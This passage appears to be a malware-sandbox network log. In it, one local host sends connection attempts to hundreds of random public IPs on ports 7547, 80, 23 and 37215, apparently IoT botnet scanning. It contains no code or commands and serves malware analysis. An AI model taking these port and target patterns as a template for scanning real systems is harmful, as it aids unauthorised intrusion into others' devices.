                                          Nov 7, 2024 11:57:59.395613909 CET30567547192.168.2.1374.199.6.154
                                          Nov 7, 2024 11:57:59.395615101 CET30567547192.168.2.1348.208.251.46
                                          Nov 7, 2024 11:57:59.395615101 CET30567547192.168.2.1325.212.32.9
                                          Nov 7, 2024 11:57:59.395615101 CET30567547192.168.2.1389.95.68.47
                                          Nov 7, 2024 11:57:59.395615101 CET30567547192.168.2.1344.162.57.30
                                          Nov 7, 2024 11:57:59.395615101 CET30567547192.168.2.1336.175.180.109
                                          Nov 7, 2024 11:57:59.395617008 CET30567547192.168.2.13205.18.170.120
                                          Nov 7, 2024 11:57:59.395617008 CET30567547192.168.2.13177.238.20.223
                                          Nov 7, 2024 11:57:59.395617008 CET30567547192.168.2.13200.141.196.120
                                          Nov 7, 2024 11:57:59.395617008 CET30567547192.168.2.1335.22.223.193
                                          Nov 7, 2024 11:57:59.395617008 CET30567547192.168.2.13184.154.206.249
                                          Nov 7, 2024 11:57:59.395617008 CET30567547192.168.2.13110.254.140.150
                                          Nov 7, 2024 11:57:59.395641088 CET30567547192.168.2.1388.194.91.98
                                          Nov 7, 2024 11:57:59.395641088 CET30567547192.168.2.13152.4.94.144
                                          Nov 7, 2024 11:57:59.395642042 CET30567547192.168.2.13122.77.27.71
                                          Nov 7, 2024 11:57:59.395642042 CET30567547192.168.2.13189.16.21.193
                                          Nov 7, 2024 11:57:59.395642042 CET30567547192.168.2.1391.245.25.232
                                          Nov 7, 2024 11:57:59.395651102 CET30567547192.168.2.13148.86.76.50
                                          Nov 7, 2024 11:57:59.395662069 CET30567547192.168.2.13130.106.31.177
                                          Nov 7, 2024 11:57:59.395664930 CET30567547192.168.2.1383.59.2.115
                                          Nov 7, 2024 11:57:59.395670891 CET30567547192.168.2.13203.41.165.88
                                          Nov 7, 2024 11:57:59.395678043 CET30567547192.168.2.13142.27.219.230
                                          Nov 7, 2024 11:57:59.395678043 CET30567547192.168.2.1342.192.220.218
                                          Nov 7, 2024 11:57:59.395683050 CET30567547192.168.2.13173.158.54.47
                                          Nov 7, 2024 11:57:59.395683050 CET30567547192.168.2.13108.222.90.158
                                          Nov 7, 2024 11:57:59.395703077 CET30567547192.168.2.1344.138.104.155
                                          Nov 7, 2024 11:57:59.395714045 CET30567547192.168.2.1372.13.180.247
                                          Nov 7, 2024 11:57:59.395716906 CET30567547192.168.2.13120.25.56.192
                                          Nov 7, 2024 11:57:59.395719051 CET30567547192.168.2.1375.29.172.193
                                          Nov 7, 2024 11:57:59.395719051 CET30567547192.168.2.13141.199.197.188
                                          Nov 7, 2024 11:57:59.395720005 CET30567547192.168.2.1339.158.254.219
                                          Nov 7, 2024 11:57:59.395723104 CET30567547192.168.2.13209.19.154.154
                                          Nov 7, 2024 11:57:59.395735979 CET30567547192.168.2.13188.172.170.176
                                          Nov 7, 2024 11:57:59.395735979 CET30567547192.168.2.13131.152.70.155
                                          Nov 7, 2024 11:57:59.395735979 CET30567547192.168.2.1378.26.8.130
                                          Nov 7, 2024 11:57:59.395739079 CET30567547192.168.2.13131.102.21.3
                                          Nov 7, 2024 11:57:59.395739079 CET30567547192.168.2.13160.48.167.13
                                          Nov 7, 2024 11:57:59.395739079 CET30567547192.168.2.13132.166.216.44
                                          Nov 7, 2024 11:57:59.395742893 CET30567547192.168.2.13218.139.136.96
                                          Nov 7, 2024 11:57:59.395744085 CET30567547192.168.2.13150.238.36.89
                                          Nov 7, 2024 11:57:59.395744085 CET30567547192.168.2.13143.169.96.43
                                          Nov 7, 2024 11:57:59.395744085 CET30567547192.168.2.13192.43.56.228
                                          Nov 7, 2024 11:57:59.395744085 CET30567547192.168.2.1314.188.229.95
                                          Nov 7, 2024 11:57:59.395744085 CET30567547192.168.2.13124.146.190.102
                                          Nov 7, 2024 11:57:59.395744085 CET30567547192.168.2.13197.32.254.149
                                          Nov 7, 2024 11:57:59.395747900 CET30567547192.168.2.13187.140.91.164
                                          Nov 7, 2024 11:57:59.395750046 CET30567547192.168.2.13104.139.220.161
                                          Nov 7, 2024 11:57:59.395750046 CET30567547192.168.2.1395.215.227.199
                                          Nov 7, 2024 11:57:59.395761013 CET30567547192.168.2.13140.14.76.254
                                          Nov 7, 2024 11:57:59.395761013 CET30567547192.168.2.1324.224.13.68
                                          Nov 7, 2024 11:57:59.395761013 CET30567547192.168.2.1360.46.70.19
                                          Nov 7, 2024 11:57:59.395761013 CET30567547192.168.2.1360.56.182.63
                                          Nov 7, 2024 11:57:59.395772934 CET30567547192.168.2.13177.5.36.176
                                          Nov 7, 2024 11:57:59.395772934 CET30567547192.168.2.13182.41.227.82
                                          Nov 7, 2024 11:57:59.395772934 CET30567547192.168.2.1341.218.52.245
                                          Nov 7, 2024 11:57:59.395776987 CET30567547192.168.2.13113.185.218.114
                                          Nov 7, 2024 11:57:59.395782948 CET30567547192.168.2.1395.62.114.226
                                          Nov 7, 2024 11:57:59.395782948 CET30567547192.168.2.13145.163.252.136
                                          Nov 7, 2024 11:57:59.395787001 CET30567547192.168.2.1395.67.233.0
                                          Nov 7, 2024 11:57:59.395787954 CET30567547192.168.2.1320.93.132.121
                                          Nov 7, 2024 11:57:59.395801067 CET30567547192.168.2.13161.229.225.154
                                          Nov 7, 2024 11:57:59.395801067 CET30567547192.168.2.13129.215.66.79
                                          Nov 7, 2024 11:57:59.395806074 CET30567547192.168.2.13220.249.145.52
                                          Nov 7, 2024 11:57:59.395807981 CET30567547192.168.2.13162.215.96.55
                                          Nov 7, 2024 11:57:59.395818949 CET30567547192.168.2.1318.104.60.104
                                          Nov 7, 2024 11:57:59.395826101 CET30567547192.168.2.13110.95.156.8
                                          Nov 7, 2024 11:57:59.395828962 CET30567547192.168.2.13128.203.171.89
                                          Nov 7, 2024 11:57:59.395831108 CET30567547192.168.2.1368.164.83.192
                                          Nov 7, 2024 11:57:59.395834923 CET30567547192.168.2.13107.54.102.247
                                          Nov 7, 2024 11:57:59.395842075 CET30567547192.168.2.13177.239.49.166
                                          Nov 7, 2024 11:57:59.395842075 CET30567547192.168.2.1382.114.81.91
                                          Nov 7, 2024 11:57:59.395849943 CET30567547192.168.2.1369.85.3.119
                                          Nov 7, 2024 11:57:59.395853043 CET30567547192.168.2.13137.29.55.185
                                          Nov 7, 2024 11:57:59.395863056 CET30567547192.168.2.13153.141.118.167
                                          Nov 7, 2024 11:57:59.395865917 CET30567547192.168.2.1381.84.157.151
                                          Nov 7, 2024 11:57:59.395868063 CET30567547192.168.2.1386.60.238.66
                                          Nov 7, 2024 11:57:59.395868063 CET30567547192.168.2.1335.33.161.196
                                          Nov 7, 2024 11:57:59.395868063 CET30567547192.168.2.1388.150.43.172
                                          Nov 7, 2024 11:57:59.395869017 CET30567547192.168.2.1387.154.98.11
                                          Nov 7, 2024 11:57:59.395874023 CET30567547192.168.2.13124.232.201.11
                                          Nov 7, 2024 11:57:59.395900011 CET30567547192.168.2.13141.140.195.47
                                          Nov 7, 2024 11:57:59.395900965 CET30567547192.168.2.13182.72.145.200
                                          Nov 7, 2024 11:57:59.396629095 CET254480192.168.2.1395.216.207.166
                                          Nov 7, 2024 11:57:59.396629095 CET254480192.168.2.1395.185.197.189
                                          Nov 7, 2024 11:57:59.396645069 CET254480192.168.2.1395.80.31.23
                                          Nov 7, 2024 11:57:59.396648884 CET254480192.168.2.1395.202.60.125
                                          Nov 7, 2024 11:57:59.396650076 CET254480192.168.2.1395.206.11.244
                                          Nov 7, 2024 11:57:59.396653891 CET254480192.168.2.1395.152.126.19
                                          Nov 7, 2024 11:57:59.396671057 CET254480192.168.2.1395.12.177.40
                                          Nov 7, 2024 11:57:59.396678925 CET254480192.168.2.1395.122.232.124
                                          Nov 7, 2024 11:57:59.396688938 CET254480192.168.2.1395.171.60.73
                                          Nov 7, 2024 11:57:59.396688938 CET254480192.168.2.1395.54.69.94
                                          Nov 7, 2024 11:57:59.396699905 CET254480192.168.2.1395.109.46.82
                                          Nov 7, 2024 11:57:59.396699905 CET254480192.168.2.1395.20.131.148
                                          Nov 7, 2024 11:57:59.396702051 CET254480192.168.2.1395.240.127.191
                                          Nov 7, 2024 11:57:59.396712065 CET254480192.168.2.1395.232.38.204
                                          Nov 7, 2024 11:57:59.396713018 CET254480192.168.2.1395.27.220.198
                                          Nov 7, 2024 11:57:59.396729946 CET254480192.168.2.1395.114.254.27
                                          Nov 7, 2024 11:57:59.396729946 CET254480192.168.2.1395.94.29.149
                                          Nov 7, 2024 11:57:59.396734953 CET254480192.168.2.1395.197.128.190
                                          Nov 7, 2024 11:57:59.396734953 CET254480192.168.2.1395.82.41.71
                                          Nov 7, 2024 11:57:59.396737099 CET254480192.168.2.1395.126.169.164
                                          Nov 7, 2024 11:57:59.396760941 CET254480192.168.2.1395.212.112.124
                                          Nov 7, 2024 11:57:59.396760941 CET254480192.168.2.1395.48.170.162
                                          Nov 7, 2024 11:57:59.396773100 CET254480192.168.2.1395.17.234.210
                                          Nov 7, 2024 11:57:59.396796942 CET254480192.168.2.1395.97.207.222
                                          Nov 7, 2024 11:57:59.396800995 CET254480192.168.2.1395.23.63.194
                                          Nov 7, 2024 11:57:59.396801949 CET254480192.168.2.1395.37.129.112
                                          Nov 7, 2024 11:57:59.396800995 CET254480192.168.2.1395.196.26.104
                                          Nov 7, 2024 11:57:59.396822929 CET254480192.168.2.1395.195.1.57
                                          Nov 7, 2024 11:57:59.396826982 CET254480192.168.2.1395.182.237.174
                                          Nov 7, 2024 11:57:59.396830082 CET254480192.168.2.1395.34.190.207
                                          Nov 7, 2024 11:57:59.396831036 CET254480192.168.2.1395.147.210.73
                                          Nov 7, 2024 11:57:59.396832943 CET254480192.168.2.1395.56.105.98
                                          Nov 7, 2024 11:57:59.396852016 CET254480192.168.2.1395.62.131.245
                                          Nov 7, 2024 11:57:59.396852016 CET254480192.168.2.1395.75.185.154
                                          Nov 7, 2024 11:57:59.396852970 CET254480192.168.2.1395.164.46.31
                                          Nov 7, 2024 11:57:59.396873951 CET254480192.168.2.1395.0.103.176
                                          Nov 7, 2024 11:57:59.396873951 CET254480192.168.2.1395.63.1.124
                                          Nov 7, 2024 11:57:59.396878004 CET254480192.168.2.1395.224.125.66
                                          Nov 7, 2024 11:57:59.396879911 CET254480192.168.2.1395.244.6.200
                                          Nov 7, 2024 11:57:59.396893024 CET254480192.168.2.1395.20.69.124
                                          Nov 7, 2024 11:57:59.396898031 CET254480192.168.2.1395.226.107.129
                                          Nov 7, 2024 11:57:59.396903038 CET254480192.168.2.1395.148.54.171
                                          Nov 7, 2024 11:57:59.396913052 CET254480192.168.2.1395.146.140.169
                                          Nov 7, 2024 11:57:59.396913052 CET254480192.168.2.1395.17.132.162
                                          Nov 7, 2024 11:57:59.396915913 CET254480192.168.2.1395.26.105.78
                                          Nov 7, 2024 11:57:59.396934986 CET254480192.168.2.1395.45.84.151
                                          Nov 7, 2024 11:57:59.396936893 CET254480192.168.2.1395.185.163.211
                                          Nov 7, 2024 11:57:59.396936893 CET254480192.168.2.1395.19.221.87
                                          Nov 7, 2024 11:57:59.396953106 CET254480192.168.2.1395.40.92.186
                                          Nov 7, 2024 11:57:59.396970034 CET254480192.168.2.1395.239.213.78
                                          Nov 7, 2024 11:57:59.396970987 CET254480192.168.2.1395.245.188.2
                                          Nov 7, 2024 11:57:59.396981001 CET254480192.168.2.1395.172.234.100
                                          Nov 7, 2024 11:57:59.396982908 CET254480192.168.2.1395.230.106.165
                                          Nov 7, 2024 11:57:59.396984100 CET254480192.168.2.1395.141.119.15
                                          Nov 7, 2024 11:57:59.396996021 CET254480192.168.2.1395.49.148.195
                                          Nov 7, 2024 11:57:59.397000074 CET254480192.168.2.1395.156.102.27
                                          Nov 7, 2024 11:57:59.397010088 CET254480192.168.2.1395.58.185.248
                                          Nov 7, 2024 11:57:59.397011042 CET254480192.168.2.1395.7.182.226
                                          Nov 7, 2024 11:57:59.397016048 CET254480192.168.2.1395.249.168.96
                                          Nov 7, 2024 11:57:59.397022963 CET254480192.168.2.1395.208.35.155
                                          Nov 7, 2024 11:57:59.397031069 CET254480192.168.2.1395.59.48.196
                                          Nov 7, 2024 11:57:59.397042036 CET254480192.168.2.1395.172.237.121
                                          Nov 7, 2024 11:57:59.397042036 CET254480192.168.2.1395.73.66.116
                                          Nov 7, 2024 11:57:59.397042990 CET254480192.168.2.1395.162.66.109
                                          Nov 7, 2024 11:57:59.397056103 CET254480192.168.2.1395.159.62.124
                                          Nov 7, 2024 11:57:59.397057056 CET254480192.168.2.1395.197.23.141
                                          Nov 7, 2024 11:57:59.397070885 CET254480192.168.2.1395.80.177.182
                                          Nov 7, 2024 11:57:59.397070885 CET254480192.168.2.1395.155.40.140
                                          Nov 7, 2024 11:57:59.397073984 CET254480192.168.2.1395.78.46.89
                                          Nov 7, 2024 11:57:59.397094965 CET254480192.168.2.1395.115.42.84
                                          Nov 7, 2024 11:57:59.397095919 CET254480192.168.2.1395.205.159.29
                                          Nov 7, 2024 11:57:59.397100925 CET254480192.168.2.1395.217.80.80
                                          Nov 7, 2024 11:57:59.397118092 CET254480192.168.2.1395.114.91.215
                                          Nov 7, 2024 11:57:59.397118092 CET254480192.168.2.1395.48.40.176
                                          Nov 7, 2024 11:57:59.397130013 CET254480192.168.2.1395.27.45.142
                                          Nov 7, 2024 11:57:59.397130966 CET254480192.168.2.1395.214.175.46
                                          Nov 7, 2024 11:57:59.397147894 CET254480192.168.2.1395.216.40.189
                                          Nov 7, 2024 11:57:59.397147894 CET254480192.168.2.1395.106.233.146
                                          Nov 7, 2024 11:57:59.397152901 CET254480192.168.2.1395.125.114.190
                                          Nov 7, 2024 11:57:59.397156000 CET254480192.168.2.1395.56.73.124
                                          Nov 7, 2024 11:57:59.397156954 CET254480192.168.2.1395.80.104.252
                                          Nov 7, 2024 11:57:59.397181034 CET254480192.168.2.1395.204.248.200
                                          Nov 7, 2024 11:57:59.397181988 CET254480192.168.2.1395.4.121.35
                                          Nov 7, 2024 11:57:59.397185087 CET254480192.168.2.1395.197.122.220
                                          Nov 7, 2024 11:57:59.397185087 CET254480192.168.2.1395.62.98.10
                                          Nov 7, 2024 11:57:59.397197008 CET254480192.168.2.1395.50.190.247
                                          Nov 7, 2024 11:57:59.397202015 CET254480192.168.2.1395.238.182.115
                                          Nov 7, 2024 11:57:59.397212982 CET254480192.168.2.1395.203.47.6
                                          Nov 7, 2024 11:57:59.397217035 CET254480192.168.2.1395.150.125.114
                                          Nov 7, 2024 11:57:59.397223949 CET254480192.168.2.1395.119.47.188
                                          Nov 7, 2024 11:57:59.397228003 CET254480192.168.2.1395.28.20.229
                                          Nov 7, 2024 11:57:59.397238016 CET254480192.168.2.1395.222.124.203
                                          Nov 7, 2024 11:57:59.397242069 CET254480192.168.2.1395.191.76.246
                                          Nov 7, 2024 11:57:59.397248983 CET254480192.168.2.1395.164.83.142
                                          Nov 7, 2024 11:57:59.397264004 CET254480192.168.2.1395.3.27.76
                                          Nov 7, 2024 11:57:59.397265911 CET254480192.168.2.1395.210.104.110
                                          Nov 7, 2024 11:57:59.397279978 CET254480192.168.2.1395.195.19.228
                                          Nov 7, 2024 11:57:59.397288084 CET254480192.168.2.1395.156.232.249
                                          Nov 7, 2024 11:57:59.397288084 CET254480192.168.2.1395.180.203.75
                                          Nov 7, 2024 11:57:59.397290945 CET254480192.168.2.1395.177.38.212
                                          Nov 7, 2024 11:57:59.397303104 CET254480192.168.2.1395.72.202.52
                                          Nov 7, 2024 11:57:59.397317886 CET254480192.168.2.1395.229.225.3
                                          Nov 7, 2024 11:57:59.397317886 CET254480192.168.2.1395.42.56.214
                                          Nov 7, 2024 11:57:59.397320986 CET254480192.168.2.1395.132.59.224
                                          Nov 7, 2024 11:57:59.397336006 CET254480192.168.2.1395.69.172.34
                                          Nov 7, 2024 11:57:59.397346020 CET254480192.168.2.1395.145.189.7
                                          Nov 7, 2024 11:57:59.397357941 CET254480192.168.2.1395.76.115.8
                                          Nov 7, 2024 11:57:59.397361040 CET254480192.168.2.1395.115.148.41
                                          Nov 7, 2024 11:57:59.397367001 CET254480192.168.2.1395.106.28.73
                                          Nov 7, 2024 11:57:59.397376060 CET254480192.168.2.1395.49.220.254
                                          Nov 7, 2024 11:57:59.397377014 CET254480192.168.2.1395.189.26.218
                                          Nov 7, 2024 11:57:59.397383928 CET254480192.168.2.1395.150.55.78
                                          Nov 7, 2024 11:57:59.397403002 CET254480192.168.2.1395.200.137.31
                                          Nov 7, 2024 11:57:59.397403002 CET254480192.168.2.1395.72.173.222
                                          Nov 7, 2024 11:57:59.397412062 CET254480192.168.2.1395.118.110.77
                                          Nov 7, 2024 11:57:59.397430897 CET254480192.168.2.1395.76.211.77
                                          Nov 7, 2024 11:57:59.397433043 CET254480192.168.2.1395.14.224.62
                                          Nov 7, 2024 11:57:59.397437096 CET254480192.168.2.1395.106.16.242
                                          Nov 7, 2024 11:57:59.397439003 CET254480192.168.2.1395.185.59.241
                                          Nov 7, 2024 11:57:59.397449970 CET254480192.168.2.1395.254.237.141
                                          Nov 7, 2024 11:57:59.397459984 CET254480192.168.2.1395.181.75.157
                                          Nov 7, 2024 11:57:59.397461891 CET254480192.168.2.1395.251.128.99
                                          Nov 7, 2024 11:57:59.397461891 CET254480192.168.2.1395.77.37.109
                                          Nov 7, 2024 11:57:59.397471905 CET254480192.168.2.1395.164.36.189
                                          Nov 7, 2024 11:57:59.397471905 CET254480192.168.2.1395.217.207.17
                                          Nov 7, 2024 11:57:59.397485971 CET254480192.168.2.1395.151.237.45
                                          Nov 7, 2024 11:57:59.397490025 CET254480192.168.2.1395.85.36.11
                                          Nov 7, 2024 11:57:59.397496939 CET254480192.168.2.1395.168.181.70
                                          Nov 7, 2024 11:57:59.397512913 CET254480192.168.2.1395.23.38.120
                                          Nov 7, 2024 11:57:59.397516012 CET254480192.168.2.1395.196.134.144
                                          Nov 7, 2024 11:57:59.397516012 CET254480192.168.2.1395.27.63.132
                                          Nov 7, 2024 11:57:59.397516012 CET254480192.168.2.1395.5.110.150
                                          Nov 7, 2024 11:57:59.397527933 CET254480192.168.2.1395.136.192.101
                                          Nov 7, 2024 11:57:59.397553921 CET254480192.168.2.1395.17.101.206
                                          Nov 7, 2024 11:57:59.397558928 CET254480192.168.2.1395.10.33.141
                                          Nov 7, 2024 11:57:59.397558928 CET254480192.168.2.1395.1.137.93
                                          Nov 7, 2024 11:57:59.397558928 CET254480192.168.2.1395.147.195.217
                                          Nov 7, 2024 11:57:59.397558928 CET254480192.168.2.1395.164.66.72
                                          Nov 7, 2024 11:57:59.397558928 CET254480192.168.2.1395.80.132.217
                                          Nov 7, 2024 11:57:59.397567987 CET254480192.168.2.1395.223.8.104
                                          Nov 7, 2024 11:57:59.397583961 CET254480192.168.2.1395.68.47.251
                                          Nov 7, 2024 11:57:59.397583961 CET254480192.168.2.1395.19.239.59
                                          Nov 7, 2024 11:57:59.397588015 CET254480192.168.2.1395.241.134.81
                                          Nov 7, 2024 11:57:59.397588015 CET254480192.168.2.1395.78.100.134
                                          Nov 7, 2024 11:57:59.397598982 CET254480192.168.2.1395.123.207.168
                                          Nov 7, 2024 11:57:59.397614956 CET254480192.168.2.1395.209.68.178
                                          Nov 7, 2024 11:57:59.397615910 CET254480192.168.2.1395.46.47.84
                                          Nov 7, 2024 11:57:59.397625923 CET254480192.168.2.1395.137.40.241
                                          Nov 7, 2024 11:57:59.397629023 CET254480192.168.2.1395.203.9.204
                                          Nov 7, 2024 11:57:59.397629023 CET254480192.168.2.1395.208.206.165
                                          Nov 7, 2024 11:57:59.397631884 CET254480192.168.2.1395.200.176.178
                                          Nov 7, 2024 11:57:59.397633076 CET254480192.168.2.1395.199.178.66
                                          Nov 7, 2024 11:57:59.397633076 CET254480192.168.2.1395.199.128.142
                                          Nov 7, 2024 11:57:59.397636890 CET254480192.168.2.1395.210.211.170
                                          Nov 7, 2024 11:57:59.397648096 CET254480192.168.2.1395.19.105.136
                                          Nov 7, 2024 11:57:59.397656918 CET254480192.168.2.1395.84.196.186
                                          Nov 7, 2024 11:57:59.397656918 CET254480192.168.2.1395.64.30.143
                                          Nov 7, 2024 11:57:59.397664070 CET254480192.168.2.1395.5.83.0
                                          Nov 7, 2024 11:57:59.397674084 CET254480192.168.2.1395.248.237.41
                                          Nov 7, 2024 11:57:59.397676945 CET254480192.168.2.1395.18.3.117
                                          Nov 7, 2024 11:57:59.398099899 CET5845623192.168.2.13187.228.170.8
                                          Nov 7, 2024 11:57:59.398317099 CET595987547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:59.400469065 CET4112223192.168.2.13165.193.23.30
                                          Nov 7, 2024 11:57:59.400574923 CET558047547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:59.402463913 CET5275423192.168.2.13220.188.148.202
                                          Nov 7, 2024 11:57:59.402578115 CET373007547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:59.404444933 CET5495623192.168.2.13182.233.196.192
                                          Nov 7, 2024 11:57:59.404561043 CET361567547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:59.405534029 CET3070437215192.168.2.13156.236.65.205
                                          Nov 7, 2024 11:57:59.405535936 CET3070437215192.168.2.13156.138.175.35
                                          Nov 7, 2024 11:57:59.405540943 CET3070437215192.168.2.13156.41.54.98
                                          Nov 7, 2024 11:57:59.405550957 CET3070437215192.168.2.13156.155.173.69
                                          Nov 7, 2024 11:57:59.405550957 CET3070437215192.168.2.13156.45.252.12
                                          Nov 7, 2024 11:57:59.405567884 CET3070437215192.168.2.13156.80.140.233
                                          Nov 7, 2024 11:57:59.405574083 CET3070437215192.168.2.13156.251.88.190
                                          Nov 7, 2024 11:57:59.405586958 CET3070437215192.168.2.13156.212.233.151
                                          Nov 7, 2024 11:57:59.405591965 CET3070437215192.168.2.13156.224.207.12
                                          Nov 7, 2024 11:57:59.405591965 CET3070437215192.168.2.13156.147.136.42
                                          Nov 7, 2024 11:57:59.405595064 CET3070437215192.168.2.13156.234.253.140
                                          Nov 7, 2024 11:57:59.405612946 CET3070437215192.168.2.13156.103.122.4
                                          Nov 7, 2024 11:57:59.405623913 CET3070437215192.168.2.13156.3.64.200
                                          Nov 7, 2024 11:57:59.405623913 CET3070437215192.168.2.13156.21.222.213
                                          Nov 7, 2024 11:57:59.405623913 CET3070437215192.168.2.13156.16.12.93
                                          Nov 7, 2024 11:57:59.405623913 CET3070437215192.168.2.13156.240.130.167
                                          Nov 7, 2024 11:57:59.405642986 CET3070437215192.168.2.13156.128.215.63
                                          Nov 7, 2024 11:57:59.405664921 CET3070437215192.168.2.13156.113.96.179
                                          Nov 7, 2024 11:57:59.405675888 CET3070437215192.168.2.13156.79.84.205
                                          Nov 7, 2024 11:57:59.405675888 CET3070437215192.168.2.13156.255.149.204
                                          Nov 7, 2024 11:57:59.405687094 CET3070437215192.168.2.13156.123.18.233
                                          Nov 7, 2024 11:57:59.405689001 CET3070437215192.168.2.13156.161.8.188
                                          Nov 7, 2024 11:57:59.405689001 CET3070437215192.168.2.13156.177.66.29
                                          Nov 7, 2024 11:57:59.405689001 CET3070437215192.168.2.13156.219.195.28
                                          Nov 7, 2024 11:57:59.405690908 CET3070437215192.168.2.13156.249.140.142
                                          Nov 7, 2024 11:57:59.405690908 CET3070437215192.168.2.13156.41.242.248
                                          Nov 7, 2024 11:57:59.405700922 CET3070437215192.168.2.13156.212.113.179
                                          Nov 7, 2024 11:57:59.405713081 CET3070437215192.168.2.13156.10.123.124
                                          Nov 7, 2024 11:57:59.405733109 CET3070437215192.168.2.13156.225.105.175
                                          Nov 7, 2024 11:57:59.405736923 CET3070437215192.168.2.13156.230.68.127
                                          Nov 7, 2024 11:57:59.405745983 CET3070437215192.168.2.13156.108.180.250
                                          Nov 7, 2024 11:57:59.405752897 CET3070437215192.168.2.13156.89.229.9
                                          Nov 7, 2024 11:57:59.405757904 CET3070437215192.168.2.13156.98.192.53
                                          Nov 7, 2024 11:57:59.405771017 CET3070437215192.168.2.13156.196.3.252
                                          Nov 7, 2024 11:57:59.405781031 CET3070437215192.168.2.13156.137.118.160
                                          Nov 7, 2024 11:57:59.405788898 CET3070437215192.168.2.13156.240.157.179
                                          Nov 7, 2024 11:57:59.405795097 CET3070437215192.168.2.13156.88.149.235
                                          Nov 7, 2024 11:57:59.405795097 CET3070437215192.168.2.13156.59.141.72
                                          Nov 7, 2024 11:57:59.405795097 CET3070437215192.168.2.13156.230.160.180
                                          Nov 7, 2024 11:57:59.405810118 CET3070437215192.168.2.13156.80.171.209
                                          Nov 7, 2024 11:57:59.405838966 CET3070437215192.168.2.13156.42.254.178
                                          Nov 7, 2024 11:57:59.405839920 CET3070437215192.168.2.13156.136.244.168
                                          Nov 7, 2024 11:57:59.405848980 CET3070437215192.168.2.13156.168.9.54
                                          Nov 7, 2024 11:57:59.405853033 CET3070437215192.168.2.13156.51.123.6
                                          Nov 7, 2024 11:57:59.405853033 CET3070437215192.168.2.13156.252.115.20
                                          Nov 7, 2024 11:57:59.405855894 CET3070437215192.168.2.13156.95.221.249
                                          Nov 7, 2024 11:57:59.405873060 CET3070437215192.168.2.13156.172.84.60
                                          Nov 7, 2024 11:57:59.405884981 CET3070437215192.168.2.13156.178.182.41
                                          Nov 7, 2024 11:57:59.405891895 CET3070437215192.168.2.13156.130.46.74
                                          Nov 7, 2024 11:57:59.405895948 CET3070437215192.168.2.13156.81.16.229
                                          Nov 7, 2024 11:57:59.405909061 CET3070437215192.168.2.13156.171.94.42
                                          Nov 7, 2024 11:57:59.405909061 CET3070437215192.168.2.13156.104.48.97
                                          Nov 7, 2024 11:57:59.405911922 CET3070437215192.168.2.13156.99.123.75
                                          Nov 7, 2024 11:57:59.405914068 CET3070437215192.168.2.13156.124.81.248
                                          Nov 7, 2024 11:57:59.405915976 CET3070437215192.168.2.13156.47.99.206
                                          Nov 7, 2024 11:57:59.405952930 CET3070437215192.168.2.13156.255.154.188
                                          Nov 7, 2024 11:57:59.405966043 CET3070437215192.168.2.13156.244.255.231
                                          Nov 7, 2024 11:57:59.405966997 CET3070437215192.168.2.13156.231.188.154
                                          Nov 7, 2024 11:57:59.405970097 CET3070437215192.168.2.13156.4.228.99
                                          Nov 7, 2024 11:57:59.405973911 CET3070437215192.168.2.13156.205.41.100
                                          Nov 7, 2024 11:57:59.405987024 CET3070437215192.168.2.13156.120.45.205
                                          Nov 7, 2024 11:57:59.405998945 CET3070437215192.168.2.13156.173.235.246
                                          Nov 7, 2024 11:57:59.406002045 CET3070437215192.168.2.13156.233.119.140
                                          Nov 7, 2024 11:57:59.406012058 CET3070437215192.168.2.13156.232.8.7
                                          Nov 7, 2024 11:57:59.406014919 CET3070437215192.168.2.13156.36.41.236
                                          Nov 7, 2024 11:57:59.406023026 CET3070437215192.168.2.13156.29.179.149
                                          Nov 7, 2024 11:57:59.406033039 CET3070437215192.168.2.13156.35.126.104
                                          Nov 7, 2024 11:57:59.406037092 CET3070437215192.168.2.13156.70.201.60
                                          Nov 7, 2024 11:57:59.406037092 CET3070437215192.168.2.13156.13.199.70
                                          Nov 7, 2024 11:57:59.406049967 CET3070437215192.168.2.13156.83.184.253
                                          Nov 7, 2024 11:57:59.406049967 CET3070437215192.168.2.13156.52.151.20
                                          Nov 7, 2024 11:57:59.406052113 CET3070437215192.168.2.13156.208.181.152
                                          Nov 7, 2024 11:57:59.406053066 CET3070437215192.168.2.13156.184.97.111
                                          Nov 7, 2024 11:57:59.406052113 CET3070437215192.168.2.13156.212.35.33
                                          Nov 7, 2024 11:57:59.406061888 CET3070437215192.168.2.13156.69.127.35
                                          Nov 7, 2024 11:57:59.406079054 CET3070437215192.168.2.13156.139.98.158
                                          Nov 7, 2024 11:57:59.406080961 CET3070437215192.168.2.13156.141.15.100
                                          Nov 7, 2024 11:57:59.406084061 CET3070437215192.168.2.13156.238.146.205
                                          Nov 7, 2024 11:57:59.406096935 CET3070437215192.168.2.13156.25.198.124
                                          Nov 7, 2024 11:57:59.406099081 CET3070437215192.168.2.13156.37.61.224
                                          Nov 7, 2024 11:57:59.406105042 CET3070437215192.168.2.13156.35.159.115
                                          Nov 7, 2024 11:57:59.406126022 CET3070437215192.168.2.13156.45.56.98
                                          Nov 7, 2024 11:57:59.406130075 CET3070437215192.168.2.13156.41.251.198
                                          Nov 7, 2024 11:57:59.406138897 CET3070437215192.168.2.13156.81.247.138
                                          Nov 7, 2024 11:57:59.406141996 CET3070437215192.168.2.13156.30.203.160
                                          Nov 7, 2024 11:57:59.406142950 CET3070437215192.168.2.13156.97.216.52
                                          Nov 7, 2024 11:57:59.406142950 CET3070437215192.168.2.13156.67.140.175
                                          Nov 7, 2024 11:57:59.406152010 CET3070437215192.168.2.13156.247.61.119
                                          Nov 7, 2024 11:57:59.406152010 CET3070437215192.168.2.13156.174.206.220
                                          Nov 7, 2024 11:57:59.406157017 CET3070437215192.168.2.13156.196.11.0
                                          Nov 7, 2024 11:57:59.406161070 CET3070437215192.168.2.13156.30.35.204
                                          Nov 7, 2024 11:57:59.406172037 CET3070437215192.168.2.13156.222.30.184
                                          Nov 7, 2024 11:57:59.406182051 CET3070437215192.168.2.13156.224.54.103
                                          Nov 7, 2024 11:57:59.406193972 CET4479023192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:57:59.406203032 CET3070437215192.168.2.13156.59.228.79
                                          Nov 7, 2024 11:57:59.406203032 CET3070437215192.168.2.13156.208.210.142
                                          Nov 7, 2024 11:57:59.406215906 CET3070437215192.168.2.13156.117.186.199
                                          Nov 7, 2024 11:57:59.406219959 CET3070437215192.168.2.13156.154.211.51
                                          Nov 7, 2024 11:57:59.406220913 CET3070437215192.168.2.13156.93.47.247
                                          Nov 7, 2024 11:57:59.406229019 CET3070437215192.168.2.13156.183.212.165
